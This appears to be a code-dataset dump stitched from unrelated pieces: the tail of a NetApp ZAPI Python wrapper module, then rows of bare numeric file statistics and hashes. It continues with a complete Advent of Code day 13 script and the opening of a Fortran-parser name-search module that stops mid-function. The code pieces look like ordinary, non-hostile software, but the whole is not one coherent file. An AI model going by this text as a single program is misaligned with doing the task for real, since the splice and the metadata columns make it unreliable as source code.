def test_zapi_smf_mapping_apis_async_modify_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-modify-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_create(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-create', *args)
return api_call
def test_zapi_smf_mapping_apis_destroy(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-destroy', *args)
return api_call
def test_zapi_smf_mapping_apis_destroy_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-destroy-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_get(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get', *args)
return api_call
def test_zapi_smf_mapping_apis_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get-create-defaults', *args)
return api_call
def test_zapi_smf_mapping_apis_get_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_get_total_records(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get-total-records', *args)
return api_call
def test_zapi_smf_mapping_apis_list_info(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-list-info', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_async_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-async-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_async_no_query(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-async-no-query', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_create(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-create', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_default(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-default', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_default_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-default-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_get(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-get', *args)
return api_call
def test_zapi_smf_mapping_apis_modify(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-modify', *args)
return api_call
def test_zapi_smf_mapping_apis_modify_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-modify-iter', *args)
return api_call
def ucm_adapter_get(*args):
api_call = _invoke_api('ucm-adapter-get', *args)
return api_call
def ucm_adapter_get_iter(*args):
api_call = _invoke_api('ucm-adapter-get-iter', *args)
return api_call
def ucm_adapter_modify(*args):
api_call = _invoke_api('ucm-adapter-modify', *args)
return api_call
def unit_test_ktest_run(*args):
api_call = _invoke_api('unit-test-ktest-run', *args)
return api_call
def virtual_machine_get_info(*args):
api_call = _invoke_api('virtual-machine-get-info', *args)
return api_call
def virtual_machine_system_disks_get_iter(*args):
api_call = _invoke_api('virtual-machine-system-disks-get-iter', *args)
return api_call
def vmservices_vsphere_credential_check(*args):
api_call = _invoke_api('vmservices-vsphere-credential-check', *args)
return api_call
def vmservices_vsphere_credential_get(*args):
api_call = _invoke_api('vmservices-vsphere-credential-get', *args)
return api_call
def vmservices_vsphere_credential_modify(*args):
api_call = _invoke_api('vmservices-vsphere-credential-modify', *args)
return api_call
def volume_aggregate_vacate_async(*args):
api_call = _invoke_api('volume-aggregate-vacate-async', *args)
return api_call
def volume_autobalance_get_iter(*args):
api_call = _invoke_api('volume-autobalance-get-iter', *args)
return api_call
def volume_clone_get_iter(*args):
api_call = _invoke_api('volume-clone-get-iter', *args)
return api_call
def volume_copy_start(*args):
api_call = _invoke_api('volume-copy-start', *args)
return api_call
def volume_footprint_get_iter(*args):
api_call = _invoke_api('volume-footprint-get-iter', *args)
return api_call
def volume_get_iter(*args):
api_call = _invoke_api('volume-get-iter', *args)
return api_call
def volume_modify_iter(*args):
api_call = _invoke_api('volume-modify-iter', *args)
return api_call
def volume_modify_iter_async(*args):
api_call = _invoke_api('volume-modify-iter-async', *args)
return api_call
def volume_move_get_iter(*args):
api_call = _invoke_api('volume-move-get-iter', *args)
return api_call
def volume_move_modify(*args):
api_call = _invoke_api('volume-move-modify', *args)
return api_call
def volume_move_start(*args):
api_call = _invoke_api('volume-move-start', *args)
return api_call
def volume_move_target_aggr_get_iter(*args):
api_call = _invoke_api('volume-move-target-aggr-get-iter', *args)
return api_call
def volume_move_trigger_abort(*args):
api_call = _invoke_api('volume-move-trigger-abort', *args)
return api_call
def volume_move_trigger_cutover(*args):
api_call = _invoke_api('volume-move-trigger-cutover', *args)
return api_call
def volume_recovery_queue_get(*args):
api_call = _invoke_api('volume-recovery-queue-get', *args)
return api_call
def volume_recovery_queue_get_iter(*args):
api_call = _invoke_api('volume-recovery-queue-get-iter', *args)
return api_call
def volume_recovery_queue_modify_retention(*args):
api_call = _invoke_api('volume-recovery-queue-modify-retention', *args)
return api_call
def volume_recovery_queue_purge(*args):
api_call = _invoke_api('volume-recovery-queue-purge', *args)
return api_call
def volume_recovery_queue_recover(*args):
api_call = _invoke_api('volume-recovery-queue-recover', *args)
return api_call
def volume_rehost(*args):
api_call = _invoke_api('volume-rehost', *args)
return api_call
def volume_space_get_iter(*args):
api_call = _invoke_api('volume-space-get-iter', *args)
return api_call
def volume_storage_service_get_iter(*args):
api_call = _invoke_api('volume-storage-service-get-iter', *args)
return api_call
def volume_transition(*args):
api_call = _invoke_api('volume-transition', *args)
return api_call
def volume_transition_prepare_to_downgrade(*args):
api_call = _invoke_api('volume-transition-prepare-to-downgrade', *args)
return api_call
def volume_transition_protect(*args):
api_call = _invoke_api('volume-transition-protect', *args)
return api_call
def vscan_active_scanner_pool_get_iter(*args):
api_call = _invoke_api('vscan-active-scanner-pool-get-iter', *args)
return api_call
def vscan_connection_extended_stats_get_iter(*args):
api_call = _invoke_api('vscan-connection-extended-stats-get-iter', *args)
return api_call
def vscan_connection_status_all_get_iter(*args):
api_call = _invoke_api('vscan-connection-status-all-get-iter', *args)
return api_call
def vscan_events_get_iter(*args):
api_call = _invoke_api('vscan-events-get-iter', *args)
return api_call
def vscan_on_access_policy_get_iter(*args):
api_call = _invoke_api('vscan-on-access-policy-get-iter', *args)
return api_call
def vscan_scanner_pool_get_iter(*args):
api_call = _invoke_api('vscan-scanner-pool-get-iter', *args)
return api_call
def vscan_status_get_iter(*args):
api_call = _invoke_api('vscan-status-get-iter', *args)
return api_call
def vserver_add_aggregates(*args):
api_call = _invoke_api('vserver-add-aggregates', *args)
return api_call
def vserver_add_protocols(*args):
api_call = _invoke_api('vserver-add-protocols', *args)
return api_call
def vserver_config_diff_get(*args):
api_call = _invoke_api('vserver-config-diff-get', *args)
return api_call
def vserver_config_diff_get_iter(*args):
api_call = _invoke_api('vserver-config-diff-get-iter', *args)
return api_call
def vserver_create(*args):
api_call = _invoke_api('vserver-create', *args)
return api_call
def vserver_destroy(*args):
api_call = _invoke_api('vserver-destroy', *args)
return api_call
def vserver_get_iter(*args):
api_call = _invoke_api('vserver-get-iter', *args)
return api_call
def vserver_login_banner_get_iter(*args):
api_call = _invoke_api('vserver-login-banner-get-iter', *args)
return api_call
def vserver_login_banner_modify_iter(*args):
api_call = _invoke_api('vserver-login-banner-modify-iter', *args)
return api_call
def vserver_modify(*args):
api_call = _invoke_api('vserver-modify', *args)
return api_call
def vserver_modify_iter(*args):
api_call = _invoke_api('vserver-modify-iter', *args)
return api_call
def vserver_motd_get_iter(*args):
api_call = _invoke_api('vserver-motd-get-iter', *args)
return api_call
def vserver_motd_modify_iter(*args):
api_call = _invoke_api('vserver-motd-modify-iter', *args)
return api_call
def vserver_peer_accept(*args):
api_call = _invoke_api('vserver-peer-accept', *args)
return api_call
def vserver_peer_check_peer_table(*args):
api_call = _invoke_api('vserver-peer-check-peer-table', *args)
return api_call
def vserver_peer_create(*args):
api_call = _invoke_api('vserver-peer-create', *args)
return api_call
def vserver_peer_delete(*args):
api_call = _invoke_api('vserver-peer-delete', *args)
return api_call
def vserver_peer_get_iter(*args):
api_call = _invoke_api('vserver-peer-get-iter', *args)
return api_call
def vserver_peer_modify(*args):
api_call = _invoke_api('vserver-peer-modify', *args)
return api_call
def vserver_peer_reject(*args):
api_call = _invoke_api('vserver-peer-reject', *args)
return api_call
def vserver_peer_resume(*args):
api_call = _invoke_api('vserver-peer-resume', *args)
return api_call
def vserver_peer_suspend(*args):
api_call = _invoke_api('vserver-peer-suspend', *args)
return api_call
def vserver_peer_transition_create(*args):
api_call = _invoke_api('vserver-peer-transition-create', *args)
return api_call
def vserver_peer_transition_destroy(*args):
api_call = _invoke_api('vserver-peer-transition-destroy', *args)
return api_call
def vserver_peer_transition_destroy_iter(*args):
api_call = _invoke_api('vserver-peer-transition-destroy-iter', *args)
return api_call
def vserver_peer_transition_get(*args):
api_call = _invoke_api('vserver-peer-transition-get', *args)
return api_call
def vserver_peer_transition_get_iter(*args):
api_call = _invoke_api('vserver-peer-transition-get-iter', *args)
return api_call
def vserver_peer_transition_modify(*args):
api_call = _invoke_api('vserver-peer-transition-modify', *args)
return api_call
def vserver_remove_aggregates(*args):
api_call = _invoke_api('vserver-remove-aggregates', *args)
return api_call
def vserver_remove_protocols(*args):
api_call = _invoke_api('vserver-remove-protocols', *args)
return api_call
def vserver_rename(*args):
api_call = _invoke_api('vserver-rename', *args)
return api_call
def vserver_saninit(*args):
api_call = _invoke_api('vserver-saninit', *args)
return api_call
def vserver_start(*args):
api_call = _invoke_api('vserver-start', *args)
return api_call
def vserver_stop(*args):
api_call = _invoke_api('vserver-stop', *args)
return api_call
def vserver_unlock(*args):
api_call = _invoke_api('vserver-unlock', *args)
return api_call
def xml_to_dict(xml):
return xmltodict.parse(xml)
def normalize_unicode(result):
'''
Takes the dictionary @result from xml_to_dict and normalizes the
unicode characters.
Returns a new dictionary with no more unicode characters
'''
d = {}
for key,value in result.iteritems():
if isinstance(key, unicode):
key = unicodedata.normalize('NFKD', key).encode('ascii', 'ignore')
if isinstance(value, unicode):
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
d[key] = value
return d
def apicall_to_dict(api_call):
'''
Takes the apicall result, and transforms it into a dictionary
'''
xml = api_call.sprintf()
return xml_to_dict(xml)
def _invoke_api(*args):
api = NaElement(*args)
call = conn.invoke_elem(api)
if call.results_errno() != 0:
raise IOError('Failed api call=%s, errno=%s, desc=%s'
%(args, call.results_errno(), call.sprintf())
)
return call
| 31.051721
| 105
| 0.746893
| 26,996
| 181,311
| 4.628871
| 0.028597
| 0.161666
| 0.126848
| 0.196037
| 0.977393
| 0.962252
| 0.906131
| 0.733581
| 0.446515
| 0.193772
| 0
| 0.002073
| 0.137995
| 181,311
| 5,838
| 106
| 31.05704
| 0.797468
| 0.006315
| 0
| 0.330353
| 1
| 0
| 0.208646
| 0.170805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.331499
| false
| 0.00321
| 0.00619
| 0.000229
| 0.669188
| 0.001376
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
2fd36762448234362f7ae61b16d238480b32dac4
| 1,842
|
py
|
Python
|
day13.py
|
jm-projects/AdventOfCode2021
|
5c6630bf6130d4a40da4bc585e86fc8f4fd89749
|
[
"MIT"
] | null | null | null |
day13.py
|
jm-projects/AdventOfCode2021
|
5c6630bf6130d4a40da4bc585e86fc8f4fd89749
|
[
"MIT"
] | null | null | null |
day13.py
|
jm-projects/AdventOfCode2021
|
5c6630bf6130d4a40da4bc585e86fc8f4fd89749
|
[
"MIT"
] | null | null | null |
from numpy.core.numeric import count_nonzero
import pandas as pd
import numpy as np
import re
data = pd.read_csv("data/day13.csv", header = None, dtype=str, delimiter= '\n')[0]
codes = [re.split("\s\S\S\s", word) for word in data.values][1:]
# Challenge 1
word = np.array(data.values)[0]
c_dic = {c[0]:c[1] for c in codes}
c_dic['0'+word[0]] = ''
c_dic[word[-1]+'0'] = ''
word = '0'+word+'0'
steps = 10
dic = {key:0 for key in c_dic}
for i in range(len(word)-1): dic[word[i]+word[i+1]] += 1
for step in range(steps):
dic2 = {k:val for k, val in dic.items()}
for key in dic:
if key[0] != '0' and key[-1] != '0':
res = c_dic[key]
dic2[key[0]+res] += dic[key]
dic2[res+key[1]] += dic[key]
dic2[key] -= dic[key]
dic = {k:val for k, val in dic2.items()}
occ = {val:0 for k,val in c_dic.items()}
for char in word: occ[char] = 0
for key in dic:
occ[key[0]] += dic[key]
occ[key[1]] += dic[key]
out = np.sort([val for k,val in occ.items()])
print((out[-1]-out[2])//2)
# Challenge 2
word = np.array(data.values)[0]
c_dic = {c[0]:c[1] for c in codes}
c_dic['0'+word[0]] = ''
c_dic[word[-1]+'0'] = ''
word = '0'+word+'0'
steps = 40
dic = {key:0 for key in c_dic}
for i in range(len(word)-1): dic[word[i]+word[i+1]] += 1
for step in range(steps):
dic2 = {k:val for k, val in dic.items()}
for key in dic:
if key[0] != '0' and key[-1] != '0':
res = c_dic[key]
dic2[key[0]+res] += dic[key]
dic2[res+key[1]] += dic[key]
dic2[key] -= dic[key]
dic = {k:val for k, val in dic2.items()}
occ = {val:0 for k,val in c_dic.items()}
for char in word: occ[char] = 0
for key in dic:
occ[key[0]] += dic[key]
occ[key[1]] += dic[key]
out = np.sort([val for k,val in occ.items()])
print((out[-1]-out[2])//2)
| 25.943662
| 82
| 0.555375
| 361
| 1,842
| 2.795014
| 0.155125
| 0.083251
| 0.055501
| 0.071358
| 0.806739
| 0.806739
| 0.806739
| 0.806739
| 0.806739
| 0.806739
| 0
| 0.050883
| 0.231813
| 1,842
| 71
| 83
| 25.943662
| 0.662191
| 0.012486
| 0
| 0.851852
| 0
| 0
| 0.019813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ff68c81b54e463fb09babaf10ff193d2c90f9bb
| 52,261
|
py
|
Python
|
fortlab/resolver/kgsearch.py
|
grnydawn/fortlab
|
524daa6dd7c99c1ca4bf6088a8ba3e1bcd096d5d
|
[
"MIT"
] | null | null | null |
fortlab/resolver/kgsearch.py
|
grnydawn/fortlab
|
524daa6dd7c99c1ca4bf6088a8ba3e1bcd096d5d
|
[
"MIT"
] | 1
|
2021-03-29T14:54:22.000Z
|
2021-03-29T14:54:51.000Z
|
fortlab/resolver/kgsearch.py
|
grnydawn/fortlab
|
524daa6dd7c99c1ca4bf6088a8ba3e1bcd096d5d
|
[
"MIT"
] | null | null | null |
"""Fortran statments and expressions supported by current KGen
Module content
---------------
"""
# kgen_search.py
from fortlab.kgutils import show_tree, logger
from fortlab.resolver.kgparse import KGGenType
import fortlab.resolver.Fortran2003 as Fortran2003
#from typedecl_statements import TypeDeclarationStatement, TypeStmt, Procedure # TEEMP
from fortlab.resolver.typedecl_statements import TypeDeclarationStatement, TypeStmt
from fortlab.resolver.block_statements import Type, TypeDecl, Function, Subroutine, Interface, execution_part, Associate
from fortlab.resolver.statements import External, Common, SpecificBinding, Enumerator
from collections import OrderedDict
#import logging
#logger = logging.getLogger('kgen')
res_default = [ TypeDeclarationStatement ]
#res_external = [ External, Procedure ] # TEMP
res_external = [ External ]
res_typedecl = [ TypeDeclarationStatement ]
res_typestmt = [ TypeStmt ]
res_derivedtype = [ Type, TypeDecl ]
res_associate = [ Associate ]
res_kind = [ TypeDeclarationStatement ] + res_derivedtype
res_typespec = [ TypeDeclarationStatement ] + res_derivedtype
res_value = ([ TypeDeclarationStatement, Function, Interface, Enumerator ] +
res_external + res_associate)
res_subroutine = [ Subroutine, Interface ] + res_external
res_function = [ Function, Interface ] + res_external
res_subprogram = [ Subroutine, Function, Interface ] + res_external
res_common = [ Common ]
res_ptr_object = [ SpecificBinding, TypeDeclarationStatement ]
res_target = res_subprogram + res_typedecl
res_anything = res_typespec + res_subprogram + [ SpecificBinding, Common, Type, TypeDecl ]
###############################################################################
################################### COMMON ####################################
###############################################################################
class SearchException(Exception):
pass
def f2003_search_unknowns(stmt, node, config, resolvers=None, gentype=None):
"""Identify unknowns whose declaration statement will be searched by KGen.
Parameters
----------
stmt : F2PY parser statement object
Specify a statement object to be searched
node : F2PY Fortran2003 parser object
Specify an expression object to be searched
resolvers : A list of statement classes for resolver
Limits the classes of resolver
gentype : Type of state data (IN or OUT)
Specify the type of state data
Returns
-------
None
See also
--------
get_name_or_defer
get_name
defer
defer_names
"""
if node is None: return
# save in unknowns dict in stmt
if not hasattr(stmt, 'unknowns'):
stmt.unknowns = OrderedDict()
# skip searching if specified
if ( hasattr(node, 'skip_search') and node.skip_search ) or \
( hasattr(node, 'parent') and hasattr(node.parent, 'skip_search') and node.parent.skip_search ):
return
clsname = node.__class__.__name__
if clsname=='Name':
get_name(stmt, node, resolvers, config, gentype=gentype)
return
itemclsname = None
try:
if clsname.endswith('_List'):
_clsname = clsname[:-5]
for item in node.items:
if item is None: continue
itemclsname = item.__class__.__name__
if itemclsname=='Name':
get_name(stmt, item, resolvers, config, gentype=gentype)
else:
exec('search_%s(stmt, item, config, gentype=gentype)' % itemclsname)
elif clsname.startswith('End_'):
pass
else:
exec('search_%s(stmt, node, config, gentype=gentype)' % clsname)
except Exception as e:
errname = clsname
if itemclsname:
errname = itemclsname
errmsg = "Error: Fortran specification of %s is not supported yet."%errname
logger.exception(errmsg)
if config["search"]['promote_exception']:
raise
else:
print('')
print(errmsg)
print('')
print("'kgen.log' in output folder contains detail information of this error.")
print("If you send the log file to 'kgen@ucar.edu', that could be very")
print("helpful for us to support this Fortran spec. in future KGEN version.")
print('')
import sys
sys.exit(-1)
def get_name_or_defer(stmt, node, resolvers, config, defer=True, gentype=None):
"""Select a name to be searched, or defer to lower level of nodes in AST.
Parameters
----------
stmt : F2PY parser statement object
Specify a statement object to be searched
node : F2PY Fortran2003 parser object
Specify an expression object to be searched
resolvers : A list of statement classes for resolver
Limits the classes of resolver
defer : bool
check if to search lower level of nodes in AST.
gentype : Type of state data (IN or OUT)
Specify the type of state data
Returns
-------
None
See also
--------
f2003_search_unknowns
get_name
defer
defer_names
"""
from fortlab.kgutils import KGName, pack_innamepath, match_namepath
from fortlab.resolver.kgparse import ResState
from fortlab.resolver.kgintrinsics import Intrinsic_Procedures
from fortlab.resolver.base_classes import is_except
if node is None: return
# uncomment below line for debug
#print node.__class__, str(node)
if isinstance(node, Fortran2003.Name):
# skip if intrinsic
if node.string.lower() in Intrinsic_Procedures:
excepts = config["search"]['except']
if config["search"]['skip_intrinsic'] and not is_except(node, stmt, excepts):
if hasattr(node, 'parent') and not isinstance(node.parent, Fortran2003.Part_Ref) and \
not (isinstance(node.parent, Fortran2003.Function_Reference) and node.string.lower()=='null') and \
not (isinstance(node.parent, Fortran2003.Specific_Binding) and node.string.lower()=='null'):
logger.debug('Intrinsic procedure name of "%s" is used for name resolution'% \
(node.string.lower()))
logger.debug('\tnear "%s"'% stmt.item.line)
logger.debug('\tin %s'% stmt.reader.id)
else:
#if node.string.lower()!='null':
# logger.debug('Intrinsic procedure name of "%s" is skipped from name resolution'% \
# (node.string.lower()))
#logger.debug('\tnear "%s"'% stmt.item.line)
#logger.debug('\tin %s'% stmt.reader.id)
return
elif not config["search"]['skip_intrinsic'] and is_except(node, stmt, excepts):
if hasattr(node, 'parent') and not isinstance(node.parent, Fortran2003.Part_Ref) and \
not (isinstance(node.parent, Fortran2003.Function_Reference) and node.string.lower()=='null') and \
not (isinstance(node.parent, Fortran2003.Specific_Binding) and node.string.lower()=='null'):
#logger.debug('Intrinsic procedure name of "%s" is NOT skipped from name resolution'% \
# (node.string.lower()))
#logger.debug('\tnear "%s"'% stmt.item.line)
#logger.debug('\tin %s'% stmt.reader.id)
pass
else:
if node.string.lower()!='null':
logger.debug('Intrinsic procedure name of "%s" is skipped from name resolution'% \
(node.string.lower()))
logger.debug('\tnear "%s"'% stmt.item.line)
logger.debug('\tin %s'% stmt.reader.id)
return
# skip if excluded
#if config.exclude.has_key('namepath') and stmt.__class__ in execution_part:
if isinstance(config, list): import pdb; pdb.set_trace()
if 'namepath' in config["exclude"]:
for pattern, actions in config["exclude"]['namepath'].items():
name = node.string.lower()
namepath = pack_innamepath(stmt, name)
#logger.debug('%s and %s are being checked for exclusion'%(pattern, namepath))
if match_namepath(pattern, namepath):
#logger.debug('%s and %s are mathched for exclusion'%(pattern, namepath))
if not hasattr(stmt, 'exclude_names'): stmt.exclude_names = OrderedDict()
if name in stmt.exclude_names:
stmt.exclude_names[name].extend(actions)
else:
stmt.exclude_names[name] = actions
node.skip_search = True
if hasattr(node, 'parent'): node.parent.skip_search = True
return
ukey = KGName(pack_innamepath(stmt, node.string.lower()), node=node, stmt=stmt)
if gentype is None: gentype = KGGenType.STATE_IN
if resolvers is None:
stmt.unknowns[ukey] = ResState(gentype, ukey, stmt, res_default)
else:
stmt.unknowns[ukey] = ResState(gentype, ukey, stmt, resolvers)
logger.debug('%s is saved as unknown' % node.string.lower())
elif defer:
f2003_search_unknowns(stmt, node, config, resolvers, gentype=gentype)
def get_name(stmt, node, resolvers, config, gentype=None):
get_name_or_defer(stmt, node, resolvers, config, defer=False, gentype=gentype)
def defer(stmt, node, config, gentype=None):
if isinstance(node, Fortran2003.Name):
raise SearchException('%s can not be Name class' % str(node))
f2003_search_unknowns(stmt, node, config, gentype=gentype)
def defer_items(stmt, node, config, gentype=None):
if hasattr(node, 'items'):
for item in node.items:
if isinstance(item, Fortran2003.Name):
raise SearchException('%s can not be Name class' % str(item))
f2003_search_unknowns(stmt, item, config, gentype=gentype)
###############################################################################
################################### SEARCH ####################################
###############################################################################
def search_Type_Declaration_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Type_Declaration_Stmt node"""
from fortlab.kgutils import pack_innamepath, match_namepath
# collect excluded names
if 'namepath' in config["exclude"]:
for pattern, actions in config["exclude"]['namepath'].items():
decls = []
if isinstance(node.items[2], Fortran2003.Entity_Decl):
decls.append(node.items[2].items[0].string.lower())
elif isinstance(node.items[2], Fortran2003.Entity_Decl_List):
for item in node.items[2].items:
decls.append(item.items[0].string.lower())
for decl in decls:
namepath = pack_innamepath(stmt, decl)
if match_namepath(pattern, namepath):
if not hasattr(stmt, 'exclude_names'): stmt.exclude_names = OrderedDict()
if decl in stmt.exclude_names:
stmt.exclude_names[decl].extend(actions)
else:
stmt.exclude_names[decl] = actions
defer_items(stmt, node, config)
def search_Intrinsic_Type_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Intrinsic_Type_Spec node"""
defer(stmt, node.items[1], config)
def search_Kind_Selector(stmt, node, config, gentype=None):
""" Identifying a name in Kind_Selector node"""
get_name_or_defer(stmt, node.items[1], res_kind, config)
def search_Entity_Decl(stmt, node, config, gentype=None):
""" Identifying a name in Entity_Decl node"""
defer(stmt, node.items[1], config)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
def search_Explicit_Shape_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Explicit_Shape_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Dimension_Attr_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Dimension_Attr_Spec node"""
defer(stmt, node.items[1], config)
def search_Add_Operand(stmt, node, config, gentype=None):
""" Identifying a name in Add_Operand node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Mult_Operand(stmt, node, config, gentype=None):
""" Identifying a name in Mult_Operand node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Attr_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Attr_Spec node"""
defer_items(stmt, node, config)
def search_Initialization(stmt, node, config, gentype=None):
""" Identifying a name in Initialization node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Part_Ref(stmt, node, config, gentype=None):
""" Identifying a name in Part_Ref node"""
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Structure_Constructor_2(stmt, node, config, gentype=None):
""" Identifying a name in Structure_Constructor_2 node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Int_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Int_Literal_Constant node"""
if node.items[1]:
get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
def search_Signed_Int_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Signed_Int_Literal_Constant node"""
if node.items[1]:
get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
def search_Real_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Real_Literal_Constant node"""
if node.items[1]:
get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
def search_Signed_Real_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Signed_Real_Literal_Constant node"""
if node.items[1]:
get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
def search_Subroutine_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Subroutine_Stmt node"""
get_name_or_defer(stmt, node.items[2], res_typedecl, config) # dummy args
get_name_or_defer(stmt, node.items[3], res_typedecl, config) # postfix
def search_Comment(stmt, node, config, gentype=None):
""" Identifying a name in Comment node"""
if hasattr(stmt, 'write_state'):
for var in stmt.write_state:
f2003obj = Fortran2003.Variable(var)
get_name_or_defer(stmt, f2003obj, res_typedecl, config)
def search_Nonlabel_Do_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Nonlabel_Do_Stmt node"""
if len(node.items)==3:
defer(stmt, node.items[2], config)
elif len(node.items)==2:
if isinstance(node.items[0], str):
defer(stmt, node.items[1], config)
def search_Loop_Control(stmt, node, config, gentype=None):
""" Identifying a name in Loop_Control node"""
if len(node.items)==1:
get_name_or_defer(stmt, node.items[0], res_value, config)
else:
get_name_or_defer(stmt, node.items[0], res_typedecl, config, gentype=KGGenType.STATE_OUT)
if isinstance(node.items[1], list):
for item in node.items[1]:
get_name_or_defer(stmt, item, res_value, config)
else:
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Assignment_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Assignment_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=KGGenType.STATE_OUT)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Level_2_Expr(stmt, node, config, gentype=None):
""" Identifying a name in Level_2_Expr node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Parenthesis(stmt, node, config, gentype=None):
""" Identifying a name in Parenthesis node"""
get_name_or_defer(stmt, node.items[1], res_value, config, gentype=gentype)
def search_str(stmt, string, config, gentype=None):
pass
def search_Function_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Function_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_derivedtype, config ) # prefix
get_name_or_defer(stmt, node.items[2], res_typedecl, config) # dummy args
get_name_or_defer(stmt, node.items[3], res_typedecl, config)
def search_Assumed_Shape_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Assumed_Shape_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Allocate_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Allocate_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_typespec, config)
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
defer(stmt, node.items[2], config)
def search_Allocation(stmt, node, config, gentype=None):
""" Identifying a name in Allocation node"""
get_name_or_defer(stmt, node.items[0], res_typedecl, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
#if len(node.items)>1:
# defer_items(stmt, node.items[1:])
def search_Allocate_Shape_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Allocate_Shape_Spec node"""
if node.items:
for item in node.items:
get_name_or_defer(stmt, item, res_value, config)
def search_Use_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Use_Stmt node"""
pass
def search_If_Then_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in If_Then_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Level_4_Expr(stmt, node, config, gentype=None):
""" Identifying a name in Level_4_Expr node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_If_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in If_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Else_If_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Else_If_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Else_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Else_Stmt node"""
pass
def search_Level_2_Unary_Expr(stmt, node, config, gentype=None):
""" Identifying a name in Level_2_Unary_Expr node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Label_Do_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Label_Do_Stmt node"""
